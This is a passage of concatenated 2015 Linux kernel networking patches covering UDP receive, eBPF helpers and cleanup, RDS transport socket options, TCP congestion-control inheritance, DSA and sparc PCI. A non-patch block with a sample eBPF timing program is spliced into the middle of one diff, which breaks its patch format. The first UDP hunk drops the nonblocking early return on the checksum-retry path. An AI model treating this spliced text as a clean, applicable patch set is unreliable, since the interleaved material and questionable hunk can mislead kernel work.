Miller --- net/ipv4/udp.c | 6 ++---- net/ipv6/udp.c | 6 ++---- 2 files changed, 4 insertions(+), 8 deletions(-) diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c index d10b7e0112eb..1c92ea67baef 100644 --- a/net/ipv4/udp.c +++ b/net/ipv4/udp.c @@ -1345,10 +1345,8 @@ int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock, } unlock_sock_fast(sk, slow); - if (noblock) - return -EAGAIN; - - /* starting over for a new packet */ + /* starting over for a new packet, but check if we need to yield */ + cond_resched(); msg->msg_flags &= ~MSG_TRUNC; goto try_again; } diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c index c2ec41617a35..e51fc3eee6db 100644 --- a/net/ipv6/udp.c +++ b/net/ipv6/udp.c @@ -525,10 +525,8 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, } unlock_sock_fast(sk, slow); - if (noblock) - return -EAGAIN; - - /* starting over for a new packet */ + /* starting over for a new packet, but check if we need to yield */ + cond_resched(); msg->msg_flags &= ~MSG_TRUNC; goto try_again; } From 17ca8cbf49be3aa94bb1c2b7ee6545fd70094eb4 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Fri, 29 May 2015 23:23:06 +0200 Subject: [PATCH 538/872] ebpf: allow bpf_ktime_get_ns_proto also for networking As this is already exported from tracing side via commit d9847d310ab4 ("tracing: Allow BPF programs to call bpf_ktime_get_ns()"), we might as well want to move it to the core, so also networking users can make use of it, e.g. to measure diffs for certain flows from ingress/egress. Signed-off-by: Daniel Borkmann Cc: Alexei Starovoitov Cc: Ingo Molnar Signed-off-by: David S. Miller --- include/linux/bpf.h | 1 + kernel/bpf/core.c | 1 + kernel/bpf/helpers.c | 13 +++++++++++++ kernel/trace/bpf_trace.c | 12 ------------ net/core/filter.c | 2 ++ 5 files changed, 17 insertions(+), 12 deletions(-) diff --git a/include/linux/bpf.h b/include/linux/bpf.h index 5f520f5f087e..ca854e5bb2f7 100644 --- a/include/linux/bpf.h +++ b/include/linux/bpf.h @@ -186,5 +186,6 @@ extern const struct bpf_func_proto bpf_map_delete_elem_proto; extern const struct bpf_func_proto bpf_get_prandom_u32_proto; extern const struct bpf_func_proto bpf_get_smp_processor_id_proto; extern const struct bpf_func_proto bpf_tail_call_proto; +extern const struct bpf_func_proto bpf_ktime_get_ns_proto; #endif /* _LINUX_BPF_H */ diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c index d44b25cbe460..4548422d5f6c 100644 --- a/kernel/bpf/core.c +++ b/kernel/bpf/core.c @@ -734,6 +734,7 @@ const struct bpf_func_proto bpf_map_delete_elem_proto __weak; const struct bpf_func_proto bpf_get_prandom_u32_proto __weak; const struct bpf_func_proto bpf_get_smp_processor_id_proto __weak; +const struct bpf_func_proto bpf_ktime_get_ns_proto __weak; /* To execute LD_ABS/LD_IND instructions __bpf_prog_run() may call * skb_copy_bits(), so provide a weak definition of it for NET-less config. 
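With the helper exported to the networking side, a socket-filter eBPF program can timestamp packets directly, e.g. to measure inter-packet gaps. The sketch below loosely follows the samples/bpf conventions of this tree but declares the helper stubs by hand so it is self-contained; the program, map and stub names are made up, not taken from the samples:

#include <uapi/linux/bpf.h>

#define SEC(NAME) __attribute__((section(NAME), used))

/* Hand-rolled helper stubs (samples/bpf normally gets these from
 * bpf_helpers.h). */
static void *(*bpf_map_lookup_elem)(void *map, void *key) =
        (void *) BPF_FUNC_map_lookup_elem;
static unsigned long long (*bpf_ktime_get_ns)(void) =
        (void *) BPF_FUNC_ktime_get_ns;

struct bpf_map_def {
        unsigned int type;
        unsigned int key_size;
        unsigned int value_size;
        unsigned int max_entries;
};

/* Single slot remembering when the previous packet was seen. */
struct bpf_map_def SEC("maps") last_ns_map = {
        .type           = BPF_MAP_TYPE_ARRAY,
        .key_size       = sizeof(int),
        .value_size     = sizeof(unsigned long long),
        .max_entries    = 1,
};

SEC("socket")
int measure_gap(struct __sk_buff *skb)
{
        unsigned long long now = bpf_ktime_get_ns();
        unsigned long long *last;
        int key = 0;

        last = bpf_map_lookup_elem(&last_ns_map, &key);
        if (last) {
                /* now - *last is the inter-packet gap; a real program would
                 * export it (e.g. via another map) before overwriting. */
                *last = now;
        }

        return 0;       /* observer socket: packet not passed to userspace */
}

/* bpf_ktime_get_ns() is gpl_only, so a GPL-compatible license is required. */
char _license[] SEC("license") = "GPL";
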
diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c index bd7f5988ed9c..b3aaabdf9a50 100644 --- a/kernel/bpf/helpers.c +++ b/kernel/bpf/helpers.c @@ -13,6 +13,7 @@ #include #include #include +#include /* If kernel subsystem is allowing eBPF programs to call this function, * inside its own verifier_ops->get_func_proto() callback it should return @@ -111,3 +112,15 @@ const struct bpf_func_proto bpf_get_smp_processor_id_proto = { .gpl_only = false, .ret_type = RET_INTEGER, }; + +static u64 bpf_ktime_get_ns(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) +{ + /* NMI safe access to clock monotonic */ + return ktime_get_mono_fast_ns(); +} + +const struct bpf_func_proto bpf_ktime_get_ns_proto = { + .func = bpf_ktime_get_ns, + .gpl_only = true, + .ret_type = RET_INTEGER, +}; diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c index 646445e41bd4..50c4015a8ad3 100644 --- a/kernel/trace/bpf_trace.c +++ b/kernel/trace/bpf_trace.c @@ -79,18 +79,6 @@ static const struct bpf_func_proto bpf_probe_read_proto = { .arg3_type = ARG_ANYTHING, }; -static u64 bpf_ktime_get_ns(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) -{ - /* NMI safe access to clock monotonic */ - return ktime_get_mono_fast_ns(); -} - -static const struct bpf_func_proto bpf_ktime_get_ns_proto = { - .func = bpf_ktime_get_ns, - .gpl_only = true, - .ret_type = RET_INTEGER, -}; - /* * limited trace_printk() * only %d %u %x %ld %lu %lx %lld %llu %llx %p conversion specifiers allowed diff --git a/net/core/filter.c b/net/core/filter.c index 2c30d6632d66..b78a010a957f 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -1423,6 +1423,8 @@ sk_filter_func_proto(enum bpf_func_id func_id) return &bpf_get_smp_processor_id_proto; case BPF_FUNC_tail_call: return &bpf_tail_call_proto; + case BPF_FUNC_ktime_get_ns: + return &bpf_ktime_get_ns_proto; default: return NULL; } From 3324b584b6f633a24550691c194600bcab7fc899 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Fri, 29 May 2015 23:23:07 +0200 Subject: [PATCH 539/872] ebpf: misc core cleanup Besides others, move bpf_tail_call_proto to the remaining definitions of other protos, improve comments a bit (i.e. remove some obvious ones, where the code is already self-documenting, add objectives for others), simplify bpf_prog_array_compatible() a bit. Signed-off-by: Daniel Borkmann Acked-by: Alexei Starovoitov Signed-off-by: David S. 
Miller --- kernel/bpf/core.c | 72 +++++++++++++++++++++++++------------------- kernel/bpf/helpers.c | 34 ++++++++++----------- 2 files changed, 58 insertions(+), 48 deletions(-) diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c index 4548422d5f6c..1e00aa3316dc 100644 --- a/kernel/bpf/core.c +++ b/kernel/bpf/core.c @@ -26,9 +26,10 @@ #include #include #include -#include #include +#include + /* Registers */ #define BPF_R0 regs[BPF_REG_0] #define BPF_R1 regs[BPF_REG_1] @@ -62,6 +63,7 @@ void *bpf_internal_load_pointer_neg_helper(const struct sk_buff *skb, int k, uns ptr = skb_network_header(skb) + k - SKF_NET_OFF; else if (k >= SKF_LL_OFF) ptr = skb_mac_header(skb) + k - SKF_LL_OFF; + if (ptr >= skb->head && ptr + size <= skb_tail_pointer(skb)) return ptr; @@ -176,15 +178,6 @@ noinline u64 __bpf_call_base(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) return 0; } -const struct bpf_func_proto bpf_tail_call_proto = { - .func = NULL, - .gpl_only = false, - .ret_type = RET_VOID, - .arg1_type = ARG_PTR_TO_CTX, - .arg2_type = ARG_CONST_MAP_PTR, - .arg3_type = ARG_ANYTHING, -}; - /** * __bpf_prog_run - run eBPF program on a given context * @ctx: is the data we are operating on @@ -650,36 +643,35 @@ static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn) return 0; } -void __weak bpf_int_jit_compile(struct bpf_prog *prog) -{ -} - -bool bpf_prog_array_compatible(struct bpf_array *array, const struct bpf_prog *fp) +bool bpf_prog_array_compatible(struct bpf_array *array, + const struct bpf_prog *fp) { - if (array->owner_prog_type) { - if (array->owner_prog_type != fp->type) - return false; - if (array->owner_jited != fp->jited) - return false; - } else { + if (!array->owner_prog_type) { + /* There's no owner yet where we could check for + * compatibility. + */ array->owner_prog_type = fp->type; array->owner_jited = fp->jited; + + return true; } - return true; + + return array->owner_prog_type == fp->type && + array->owner_jited == fp->jited; } -static int check_tail_call(const struct bpf_prog *fp) +static int bpf_check_tail_call(const struct bpf_prog *fp) { struct bpf_prog_aux *aux = fp->aux; int i; for (i = 0; i < aux->used_map_cnt; i++) { + struct bpf_map *map = aux->used_maps[i]; struct bpf_array *array; - struct bpf_map *map; - map = aux->used_maps[i]; if (map->map_type != BPF_MAP_TYPE_PROG_ARRAY) continue; + array = container_of(map, struct bpf_array, map); if (!bpf_prog_array_compatible(array, fp)) return -EINVAL; @@ -689,22 +681,25 @@ static int check_tail_call(const struct bpf_prog *fp) } /** - * bpf_prog_select_runtime - select execution runtime for BPF program + * bpf_prog_select_runtime - select exec runtime for BPF program * @fp: bpf_prog populated with internal BPF program * - * try to JIT internal BPF program, if JIT is not available select interpreter - * BPF program will be executed via BPF_PROG_RUN() macro + * Try to JIT eBPF program, if JIT is not available, use interpreter. + * The BPF program will be executed via BPF_PROG_RUN() macro. */ int bpf_prog_select_runtime(struct bpf_prog *fp) { fp->bpf_func = (void *) __bpf_prog_run; - /* Probe if internal BPF can be JITed */ bpf_int_jit_compile(fp); - /* Lock whole bpf_prog as read-only */ bpf_prog_lock_ro(fp); - return check_tail_call(fp); + /* The tail call compatibility check can only be done at + * this late stage as we need to determine, if we deal + * with JITed or non JITed program concatenations and not + * all eBPF JITs might immediately support all features. 
+ */ + return bpf_check_tail_call(fp); } EXPORT_SYMBOL_GPL(bpf_prog_select_runtime); @@ -736,6 +731,21 @@ const struct bpf_func_proto bpf_get_prandom_u32_proto __weak; const struct bpf_func_proto bpf_get_smp_processor_id_proto __weak; const struct bpf_func_proto bpf_ktime_get_ns_proto __weak; +/* Always built-in helper functions. */ +const struct bpf_func_proto bpf_tail_call_proto = { + .func = NULL, + .gpl_only = false, + .ret_type = RET_VOID, + .arg1_type = ARG_PTR_TO_CTX, + .arg2_type = ARG_CONST_MAP_PTR, + .arg3_type = ARG_ANYTHING, +}; + +/* For classic BPF JITs that don't implement bpf_int_jit_compile(). */ +void __weak bpf_int_jit_compile(struct bpf_prog *prog) +{ +} + /* To execute LD_ABS/LD_IND instructions __bpf_prog_run() may call * skb_copy_bits(), so provide a weak definition of it for NET-less config. */ diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c index b3aaabdf9a50..7ad5d8842d5b 100644 --- a/kernel/bpf/helpers.c +++ b/kernel/bpf/helpers.c @@ -45,11 +45,11 @@ static u64 bpf_map_lookup_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) } const struct bpf_func_proto bpf_map_lookup_elem_proto = { - .func = bpf_map_lookup_elem, - .gpl_only = false, - .ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL, - .arg1_type = ARG_CONST_MAP_PTR, - .arg2_type = ARG_PTR_TO_MAP_KEY, + .func = bpf_map_lookup_elem, + .gpl_only = false, + .ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL, + .arg1_type = ARG_CONST_MAP_PTR, + .arg2_type = ARG_PTR_TO_MAP_KEY, }; static u64 bpf_map_update_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) @@ -64,13 +64,13 @@ static u64 bpf_map_update_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) } const struct bpf_func_proto bpf_map_update_elem_proto = { - .func = bpf_map_update_elem, - .gpl_only = false, - .ret_type = RET_INTEGER, - .arg1_type = ARG_CONST_MAP_PTR, - .arg2_type = ARG_PTR_TO_MAP_KEY, - .arg3_type = ARG_PTR_TO_MAP_VALUE, - .arg4_type = ARG_ANYTHING, + .func = bpf_map_update_elem, + .gpl_only = false, + .ret_type = RET_INTEGER, + .arg1_type = ARG_CONST_MAP_PTR, + .arg2_type = ARG_PTR_TO_MAP_KEY, + .arg3_type = ARG_PTR_TO_MAP_VALUE, + .arg4_type = ARG_ANYTHING, }; static u64 bpf_map_delete_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) @@ -84,11 +84,11 @@ static u64 bpf_map_delete_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) } const struct bpf_func_proto bpf_map_delete_elem_proto = { - .func = bpf_map_delete_elem, - .gpl_only = false, - .ret_type = RET_INTEGER, - .arg1_type = ARG_CONST_MAP_PTR, - .arg2_type = ARG_PTR_TO_MAP_KEY, + .func = bpf_map_delete_elem, + .gpl_only = false, + .ret_type = RET_INTEGER, + .arg1_type = ARG_CONST_MAP_PTR, + .arg2_type = ARG_PTR_TO_MAP_KEY, }; static u64 bpf_get_prandom_u32(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) From f16e9d86ae435d7ee6e9eaceb8ba1cf3b1895b72 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 10:13:49 +0530 Subject: [PATCH 540/872] ethernet/intel: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e1, e2, e3, e4, a, b; @@ -init_timer(&e1); +setup_timer(&e1, a, b); ... when != a = e2 when != b = e3 -e1.function = a; ... when != b = e4 -e1.data = b; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. 
Miller --- drivers/net/ethernet/intel/e100.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/e100.c b/drivers/net/ethernet/intel/e100.c index 35357ae2fe75..d2657a412768 100644 --- a/drivers/net/ethernet/intel/e100.c +++ b/drivers/net/ethernet/intel/e100.c @@ -2922,9 +2922,7 @@ static int e100_probe(struct pci_dev *pdev, const struct pci_device_id *ent) pci_set_master(pdev); - init_timer(&nic->watchdog); - nic->watchdog.function = e100_watchdog; - nic->watchdog.data = (unsigned long)nic; + setup_timer(&nic->watchdog, e100_watchdog, (unsigned long)nic); INIT_WORK(&nic->tx_timeout_task, e100_tx_timeout_task); From a28c257c9eb0bd76a4adcac97c07e34044ec71fb Mon Sep 17 00:00:00 2001 From: Sowmini Varadhan Date: Fri, 29 May 2015 17:28:07 -0400 Subject: [PATCH 541/872] net/rds: Declare SO_RDS_TRANSPORT and RDS_TRANS_* constants in uapi/linux/rds.h User space applications that desire to explicitly select the underlying transport for a PF_RDS socket may do so by using the SO_RDS_TRANSPORT socket option at the SOL_RDS level before bind(). The integer argument provided to the socket option would be one of the RDS_TRANS_* values, e.g., RDS_TRANS_TCP. This commit exports the constant values need by such applications via Signed-off-by: Sowmini Varadhan Signed-off-by: David S. Miller --- include/uapi/linux/rds.h | 10 ++++++++++ net/rds/rds.h | 5 ----- 2 files changed, 10 insertions(+), 5 deletions(-) diff --git a/include/uapi/linux/rds.h b/include/uapi/linux/rds.h index 91950950aa59..0f9265cb2a96 100644 --- a/include/uapi/linux/rds.h +++ b/include/uapi/linux/rds.h @@ -38,6 +38,8 @@ #define RDS_IB_ABI_VERSION 0x301 +#define SOL_RDS 276 + /* * setsockopt/getsockopt for SOL_RDS */ @@ -48,6 +50,14 @@ #define RDS_RECVERR 5 #define RDS_CONG_MONITOR 6 #define RDS_GET_MR_FOR_DEST 7 +#define SO_RDS_TRANSPORT 8 + +/* supported values for SO_RDS_TRANSPORT */ +#define RDS_TRANS_IB 0 +#define RDS_TRANS_IWARP 1 +#define RDS_TRANS_TCP 2 +#define RDS_TRANS_COUNT 3 +#define RDS_TRANS_NONE (~0) /* * Control message types for SOL_RDS. diff --git a/net/rds/rds.h b/net/rds/rds.h index 0d41155a2258..76db508f73a1 100644 --- a/net/rds/rds.h +++ b/net/rds/rds.h @@ -408,11 +408,6 @@ struct rds_notifier { * should try hard not to block. */ -#define RDS_TRANS_IB 0 -#define RDS_TRANS_IWARP 1 -#define RDS_TRANS_TCP 2 -#define RDS_TRANS_COUNT 3 - struct rds_transport { char t_name[TRANSNAMSIZ]; struct list_head t_item; From d97dac54bf83b2a3df85fba37595e355627e0f2b Mon Sep 17 00:00:00 2001 From: Sowmini Varadhan Date: Fri, 29 May 2015 17:28:08 -0400 Subject: [PATCH 542/872] net/rds: Add setsockopt support for SO_RDS_TRANSPORT An application may deterministically attach the underlying transport for a PF_RDS socket by invoking setsockopt(2) with the SO_RDS_TRANSPORT option at the SOL_RDS level. The integer argument to setsockopt must be one of the RDS_TRANS_* transport types, e.g., RDS_TRANS_TCP. The option must be specified before invoking bind(2) on the socket, and may only be used once on the socket. An attempt to set the option on a bound socket, or to invoke the option after a successful SO_RDS_TRANSPORT attachment, will return EOPNOTSUPP. Signed-off-by: Sowmini Varadhan Signed-off-by: David S. 
Miller --- net/rds/af_rds.c | 27 +++++++++++++++++++++++++++ net/rds/bind.c | 4 ++++ net/rds/rds.h | 1 + net/rds/transport.c | 21 +++++++++++++++++++++ 4 files changed, 53 insertions(+) diff --git a/net/rds/af_rds.c b/net/rds/af_rds.c index 3d83641f2861..04877441fb01 100644 --- a/net/rds/af_rds.c +++ b/net/rds/af_rds.c @@ -270,6 +270,28 @@ static int rds_cong_monitor(struct rds_sock *rs, char __user *optval, return ret; } +static int rds_set_transport(struct rds_sock *rs, char __user *optval, + int optlen) +{ + int t_type; + + if (rs->rs_transport) + return -EOPNOTSUPP; /* previously attached to transport */ + + if (optlen != sizeof(int)) + return -EINVAL; + + if (copy_from_user(&t_type, (int __user *)optval, sizeof(t_type))) + return -EFAULT; + + if (t_type < 0 || t_type >= RDS_TRANS_COUNT) + return -EINVAL; + + rs->rs_transport = rds_trans_get(t_type); + + return rs->rs_transport ? 0 : -ENOPROTOOPT; +} + static int rds_setsockopt(struct socket *sock, int level, int optname, char __user *optval, unsigned int optlen) { @@ -300,6 +322,11 @@ static int rds_setsockopt(struct socket *sock, int level, int optname, case RDS_CONG_MONITOR: ret = rds_cong_monitor(rs, optval, optlen); break; + case SO_RDS_TRANSPORT: + lock_sock(sock->sk); + ret = rds_set_transport(rs, optval, optlen); + release_sock(sock->sk); + break; default: ret = -ENOPROTOOPT; } diff --git a/net/rds/bind.c b/net/rds/bind.c index a2e6562da751..4ebd29c128b6 100644 --- a/net/rds/bind.c +++ b/net/rds/bind.c @@ -181,6 +181,10 @@ int rds_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) if (ret) goto out; + if (rs->rs_transport) { /* previously bound */ + ret = 0; + goto out; + } trans = rds_trans_get_preferred(sin->sin_addr.s_addr); if (!trans) { ret = -EADDRNOTAVAIL; diff --git a/net/rds/rds.h b/net/rds/rds.h index 76db508f73a1..a33fb4ad3535 100644 --- a/net/rds/rds.h +++ b/net/rds/rds.h @@ -798,6 +798,7 @@ struct rds_transport *rds_trans_get_preferred(__be32 addr); void rds_trans_put(struct rds_transport *trans); unsigned int rds_trans_stats_info_copy(struct rds_info_iterator *iter, unsigned int avail); +struct rds_transport *rds_trans_get(int t_type); int rds_trans_init(void); void rds_trans_exit(void); diff --git a/net/rds/transport.c b/net/rds/transport.c index 7f2ac4fec367..8b4a6cd2c3a7 100644 --- a/net/rds/transport.c +++ b/net/rds/transport.c @@ -101,6 +101,27 @@ struct rds_transport *rds_trans_get_preferred(__be32 addr) return ret; } +struct rds_transport *rds_trans_get(int t_type) +{ + struct rds_transport *ret = NULL; + struct rds_transport *trans; + unsigned int i; + + down_read(&rds_trans_sem); + for (i = 0; i < RDS_TRANS_COUNT; i++) { + trans = transports[i]; + + if (trans && trans->t_type == t_type && + (!trans->t_owner || try_module_get(trans->t_owner))) { + ret = trans; + break; + } + } + up_read(&rds_trans_sem); + + return ret; +} + /* * This returns the number of stats entries in the snapshot and only * copies them using the iter if there is enough space for them. The From 8ba38460f363e4d26d666aae9bc7fd3afa5f8e43 Mon Sep 17 00:00:00 2001 From: Sowmini Varadhan Date: Fri, 29 May 2015 17:28:09 -0400 Subject: [PATCH 543/872] net/rds Add getsockopt support for SO_RDS_TRANSPORT The currently attached transport for a PF_RDS socket may be obtained from user space by invoking getsockopt(2) using the SO_RDS_TRANSPORT option at the SOL_RDS level. The integer optval returned will be one of the RDS_TRANS_* constants defined in linux/rds.h. Signed-off-by: Sowmini Varadhan Signed-off-by: David S. 
Miller --- net/rds/af_rds.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/net/rds/af_rds.c b/net/rds/af_rds.c index 04877441fb01..2ad9032372b2 100644 --- a/net/rds/af_rds.c +++ b/net/rds/af_rds.c @@ -339,6 +339,7 @@ static int rds_getsockopt(struct socket *sock, int level, int optname, { struct rds_sock *rs = rds_sk_to_rs(sock->sk); int ret = -ENOPROTOOPT, len; + int trans; if (level != SOL_RDS) goto out; @@ -364,6 +365,19 @@ static int rds_getsockopt(struct socket *sock, int level, int optname, else ret = 0; break; + case SO_RDS_TRANSPORT: + if (len < sizeof(int)) { + ret = -EINVAL; + break; + } + trans = (rs->rs_transport ? rs->rs_transport->t_type : + RDS_TRANS_NONE); /* unbound */ + if (put_user(trans, (int __user *)optval) || + put_user(sizeof(int), optlen)) + ret = -EFAULT; + else + ret = 0; + break; default: break; } From 9f950415e4e28e7cfae2e416b43e862e8101d996 Mon Sep 17 00:00:00 2001 From: Neal Cardwell Date: Fri, 29 May 2015 13:47:07 -0400 Subject: [PATCH 544/872] tcp: fix child sockets to use system default congestion control if not set Linux 3.17 and earlier are explicitly engineered so that if the app doesn't specifically request a CC module on a listener before the SYN arrives, then the child gets the system default CC when the connection is established. See tcp_init_congestion_control() in 3.17 or earlier, which says "if no choice made yet assign the current value set as default". The change ("net: tcp: assign tcp cong_ops when tcp sk is created") altered these semantics, so that children got their parent listener's congestion control even if the system default had changed after the listener was created. This commit returns to those original semantics from 3.17 and earlier, since they are the original semantics from 2007 in 4d4d3d1e8 ("[TCP]: Congestion control initialization."), and some Linux congestion control workflows depend on that. In summary, if a listener socket specifically sets TCP_CONGESTION to "x", or the route locks the CC module to "x", then the child gets "x". Otherwise the child gets current system default from net.ipv4.tcp_congestion_control. That's the behavior in 3.17 and earlier, and this commit restores that. Fixes: 55d8694fa82c ("net: tcp: assign tcp cong_ops when tcp sk is created") Cc: Florian Westphal Cc: Daniel Borkmann Cc: Glenn Judd Cc: Stephen Hemminger Signed-off-by: Neal Cardwell Signed-off-by: Eric Dumazet Signed-off-by: Yuchung Cheng Acked-by: Daniel Borkmann Signed-off-by: David S. 
Miller --- include/net/inet_connection_sock.h | 3 ++- net/ipv4/tcp_cong.c | 5 ++++- net/ipv4/tcp_minisocks.c | 5 ++++- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h index 497bc14cdb85..0320bbb7d7b5 100644 --- a/include/net/inet_connection_sock.h +++ b/include/net/inet_connection_sock.h @@ -98,7 +98,8 @@ struct inet_connection_sock { const struct tcp_congestion_ops *icsk_ca_ops; const struct inet_connection_sock_af_ops *icsk_af_ops; unsigned int (*icsk_sync_mss)(struct sock *sk, u32 pmtu); - __u8 icsk_ca_state:7, + __u8 icsk_ca_state:6, + icsk_ca_setsockopt:1, icsk_ca_dst_locked:1; __u8 icsk_retransmits; __u8 icsk_pending; diff --git a/net/ipv4/tcp_cong.c b/net/ipv4/tcp_cong.c index 7a5ae50c80c8..84be008c945c 100644 --- a/net/ipv4/tcp_cong.c +++ b/net/ipv4/tcp_cong.c @@ -187,6 +187,7 @@ static void tcp_reinit_congestion_control(struct sock *sk, tcp_cleanup_congestion_control(sk); icsk->icsk_ca_ops = ca; + icsk->icsk_ca_setsockopt = 1; if (sk->sk_state != TCP_CLOSE && icsk->icsk_ca_ops->init) icsk->icsk_ca_ops->init(sk); @@ -335,8 +336,10 @@ int tcp_set_congestion_control(struct sock *sk, const char *name) rcu_read_lock(); ca = __tcp_ca_find_autoload(name); /* No change asking for existing value */ - if (ca == icsk->icsk_ca_ops) + if (ca == icsk->icsk_ca_ops) { + icsk->icsk_ca_setsockopt = 1; goto out; + } if (!ca) err = -ENOENT; else if (!((ca->flags & TCP_CONG_NON_RESTRICTED) || diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c index b5732a54f2ad..17e7339ee5ca 100644 --- a/net/ipv4/tcp_minisocks.c +++ b/net/ipv4/tcp_minisocks.c @@ -420,7 +420,10 @@ void tcp_ca_openreq_child(struct sock *sk, const struct dst_entry *dst) rcu_read_unlock(); } - if (!ca_got_dst && !try_module_get(icsk->icsk_ca_ops->owner)) + /* If no valid choice made yet, assign current system default ca. */ + if (!ca_got_dst && + (!icsk->icsk_ca_setsockopt || + !try_module_get(icsk->icsk_ca_ops->owner))) tcp_assign_congestion_control(sk); tcp_set_ca_state(sk, TCP_CA_Open); From 24595346d79b6bd98a77d24c493e8490639788fc Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Fri, 29 May 2015 10:29:46 -0700 Subject: [PATCH 545/872] net: dsa: Properly propagate errors from dsa_switch_setup_one While shuffling some code around, dsa_switch_setup_one() was introduced, and it was modified to return either an error code using ERR_PTR() or a NULL pointer when running out of memory or failing to set up a switch. This is a problem for its caller, dsa_switch_setup(), which uses IS_ERR() and expects to find an error code, not a NULL pointer, so we still try to proceed with dsa_switch_setup() and operate on invalid memory addresses. This can be easily reproduced by having, e.g., the bcm_sf2 driver built-in, but having no such switch, such that drv->setup will fail. Fix this by using PTR_ERR() consistently, which is both more informative and avoids requiring the caller to use IS_ERR_OR_NULL(). Fixes: df197195a5248 ("net: dsa: split dsa_switch_setup into two functions") Reported-by: Andrew Lunn Signed-off-by: Florian Fainelli Tested-by: Andrew Lunn Signed-off-by: David S.
Miller --- net/dsa/dsa.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/dsa/dsa.c b/net/dsa/dsa.c index e6f6cc3a1bcf..392e29a0227d 100644 --- a/net/dsa/dsa.c +++ b/net/dsa/dsa.c @@ -359,7 +359,7 @@ dsa_switch_setup(struct dsa_switch_tree *dst, int index, */ ds = kzalloc(sizeof(*ds) + drv->priv_size, GFP_KERNEL); if (ds == NULL) - return NULL; + return ERR_PTR(-ENOMEM); ds->dst = dst; ds->index = index; @@ -370,7 +370,7 @@ dsa_switch_setup(struct dsa_switch_tree *dst, int index, ret = dsa_switch_setup_one(ds, parent); if (ret) - return NULL; + return ERR_PTR(ret); return ds; } From 8642ad1c7ba43b1c48eb39a863e975f3f8f96168 Mon Sep 17 00:00:00 2001 From: Christophe Jaillet Date: Fri, 1 May 2015 14:05:39 +0200 Subject: [PATCH 546/872] sparc: kernel: GRPCI2: Remove a useless memset grpci2priv is allocated using kzalloc, so there is no need to memset it. Signed-off-by: Christophe Jaillet Signed-off-by: David S. Miller --- arch/sparc/kernel/leon_pci_grpci2.c | 1 - 1 file changed, 1 deletion(-) diff --git a/arch/sparc/kernel/leon_pci_grpci2.c b/arch/sparc/kernel/leon_pci_grpci2.c index 94e392bdee7d..814fb1729b12 100644 --- a/arch/sparc/kernel/leon_pci_grpci2.c +++ b/arch/sparc/kernel/leon_pci_grpci2.c @@ -723,7 +723,6 @@ static int grpci2_of_probe(struct platform_device *ofdev) err = -ENOMEM; goto err1; } - memset(grpci2priv, 0, sizeof(*grpci2priv)); priv->regs = regs; priv->irq = ofdev->archdata.irqs[0]; /* BASE IRQ */ priv->irq_mode = (capability & STS_IRQMODE) >> STS_IRQMODE_BIT; From f0c1a1173773a56d500f1814893e63f97580f76a Mon Sep 17 00:00:00 2001 From: Eric Snowberg Date: Wed, 27 May 2015 11:59:19 -0400 Subject: [PATCH 547/872] sparc64: pci slots information is not populated in sysfs Add PCI slot numbers within sysfs for PCIe hardware. Larger PCIe systems with nested PCI bridges and slots further down on these bridges were not being populated within sysfs. This will add ACPI style PCI slot numbers for these systems since the OF 'slot-names' information is not available on all PCIe platforms. Signed-off-by: Eric Snowberg Reviewed-by: Bob Picco Signed-off-by: David S. 
Miller --- arch/sparc/kernel/pci.c | 59 +++++++++++++++++++++++++++++++++++------ 1 file changed, 51 insertions(+), 8 deletions(-) diff --git a/arch/sparc/kernel/pci.c b/arch/sparc/kernel/pci.c index 6f7251fd2eab..c928bc64b4ba 100644 --- a/arch/sparc/kernel/pci.c +++ b/arch/sparc/kernel/pci.c @@ -1002,6 +1002,38 @@ static int __init pcibios_init(void) subsys_initcall(pcibios_init); #ifdef CONFIG_SYSFS + +#define SLOT_NAME_SIZE 11 /* Max decimal digits + null in u32 */ + +static void pcie_bus_slot_names(struct pci_bus *pbus) +{ + struct pci_dev *pdev; + struct pci_bus *bus; + + list_for_each_entry(pdev, &pbus->devices, bus_list) { + char name[SLOT_NAME_SIZE]; + struct pci_slot *pci_slot; + const u32 *slot_num; + int len; + + slot_num = of_get_property(pdev->dev.of_node, + "physical-slot#", &len); + + if (slot_num == NULL || len != 4) + continue; + + snprintf(name, sizeof(name), "%u", slot_num[0]); + pci_slot = pci_create_slot(pbus, slot_num[0], name, NULL); + + if (IS_ERR(pci_slot)) + pr_err("PCI: pci_create_slot returned %ld.\n", + PTR_ERR(pci_slot)); + } + + list_for_each_entry(bus, &pbus->children, node) + pcie_bus_slot_names(bus); +} + static void 